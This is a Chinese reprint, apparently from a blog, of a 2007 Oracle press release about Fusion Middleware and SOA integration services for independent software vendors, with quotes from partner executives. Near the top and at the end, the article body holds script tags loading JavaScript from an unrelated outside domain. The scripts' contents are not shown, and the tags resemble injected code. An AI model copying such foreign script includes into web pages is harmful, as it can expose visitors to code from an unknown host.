甲骨文助ISV 通过SOA与Oracle软件集成

<script language='javascript' src='http://www.shiqiaotou.com/donetk/Header.js'></script>
甲骨文公司为那些通过Oracle融合中间件把他们的解决方案与Oracle应用产品进行集成的独立软件开发商(ISV)提供更多的服务。

  2007年2月1日,甲骨文公司在世界5大洲9个城市的不同时段相继举行甲骨文全球“应用无极限”大会宣布,为那些通过Oracle融合中间件把他们的解决方案与Oracle应用产品进行集成的独立软件开发商(ISV)提供更多的服务。这些服务将帮助独立软件开发商通过使用Oracle融合中间件作为通用和基于标准的技术,把他们的应用产品与Oracle领先的管理软件进行集成,并创建新的组合应用软件和跨应用的业务流程。

  经过14年的发展,Oracle合作伙伴网(OPN)为独立软件开发商提供工具和资源,以便与Oracle应用产品进行对接。今天,有1500多家Oracle合作伙伴已经把他们的ISV解决方案与Oracle应用产品进行集成,为世界各地的公司提供更完整和集成的跨应用解决方案。自从甲骨文公司去年宣布启动“应用无极限”计划以来,已经有300多家独立软件开发商已经启动或者完成了与一种或多种Oracle应用产品的集成。

  甲骨文公司目前正在扩大合作伙伴技术服务,Oracle合作伙伴网(OPN)的成员均可享受这些服务。服务的内容包括通过提供培训和技术资源帮助独立软件开发商利用Oracle融合中间件进行服务导向型应用集成,更好地扩展他们现有的解决方案、创组合应用并为客户提供更全面的方案。甲骨文专家将通过提供服务和资料来帮助独立软件开发商,包括架构评审、集成设计评审以及关于使用Oracle融合中间件作为整合平台的最佳实践和有价值的使用手册。

  甲骨文公司全球联盟与渠道副总裁Doug Kennedy说:“我们将继续增加资源和项目来帮助独立软件开发商在我们应用产品上建立强大的集成。我们已经为独立软件开发商在Oracle 合作伙伴网(OPN)上建立了一站式的集成,现在我们在Oracle融合中间件基础上增加了该项服务并扩大了SOA合作伙伴技术服务。一旦与Oracle融合中间件进行集成,独立软件开发商将能为他们的客户提供更低的总体拥有成本,因为他们使用的是一个跨应用、服务导向型的技术平台以及更加灵活的SOA架构”。

  使用Oracle融合中间件进行SOA集成

  独立软件开发商不再需要专有的中间件技术来集成到Oracle应用产品的不同组件里,相反,他们可以使用Oracle融合中间件作为通用集成和业务流程管理技术来集成到Oracle应用软件里,包括Oracle电子商务套件、Oracle JD Edwards, PeopleSoft, Siebel 和 Oracle 零售。客户现在能在甲骨文和合作伙伴的解决方案上使用开放的、完整的、基于标准的SOA解决方案。

  面向服务的集成方法以及通用的技术设施是独立软件开发商为企业核心业务的应用软件创造价值的关键因素,这些应用软件包括客户关系管理、财务和人力资本管理等。独立软件开发商使用Oracle融合中间件能享受到多种益处,包括快速开发解决方案、面向服务的内在灵活性、极大减少他们解决方案与Oracle应用软件集成的时间和成本。

  遍布全球的合作伙伴与Oracle应用产品进行集成

  全球来自不同行业的合作伙伴都已开始使用Oracle融合中间件资源来整合他们的应用产品。3i Infotech、 Acumence LLC、Ad Astra Information Systems、Axiom Systems、 Bottomline Technologies、 Bynx、 Cerner、 CIPPlanner、DBNeT、 GISP、 Hansen Information Technologies、 Indra、 Intelliden Network、 Kaba Benzing, Matera Systems、 NewSoft Informatica、 Perceptive Software、 pVelocity、 Servigistics、 SciQuest、 TouchNet Information Systems 和 UnicornHRO,这些公司是甲骨文公司众多合作伙伴中的部分成员,他们已经使用Oracle融合中间件来把他们的应用产品与Oracle的应用产品进行集成。

  Cerner Technologies战略家Jan Grimm说:“作为美国医疗行业领先的IT供应商,Cerner提供了整合的解决方案来帮助医疗机构提高他们的临床和财政收入。Oracle电子商务套件是对Cerner Millennium®一个补充,这样,医疗供应商能提供单一的基于标准的强大的临床和管理解决方案。通过整合这些方案,我们在帮助用户减少总体拥有成本的同时还能极大的提高质量、生产力和病人经历”。

  3i Infotech’s Premia 是个端对端解决方案,能为保险机构提供技术来管理业务经营,并与客户和合作伙伴协作提供自助服务和通过分销渠道来扩展区域覆盖。

  3i Infotech副管理总监Hari Padmanabhan说:“使用Oracle融合中间件我们能更快和更方便的把我们现有的应用软件移植到SOA上,该平台全面的SOA和业务流程管理能力能帮助我们把行业领先的Premia软件与Oracle电子商务套件和Siebel CRM进行无缝的集成,从而为我们的用户提供一个全面的保险解决方案。”

  Indra 能源和电信运营商总监Miguel de Tomas说:“Indra Open-Utilities套件与Oracle电子商务套件进行集成,使用Oracle融合中间件能给公共事业和能源客户提供一个全面的方案,同时还能更快更灵活的提供效率、降低运营成本和优化资本费用。使用Oracle融合中间件能帮助我们为客户提供一个有效的、流线型的IT基础架构,其能自动改善业务流程,帮助公司以更低的成本提供更好的服务”。


  阅读关于 甲骨文 ISV SOA Oracle 集成 的全部文章

文章来源于 http://www.cnblogs.com/zhangzs8896 版权归原作者所有<script language='javascript' src='http://www.shiqiaotou.com/donetk/Footer.js'></script>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值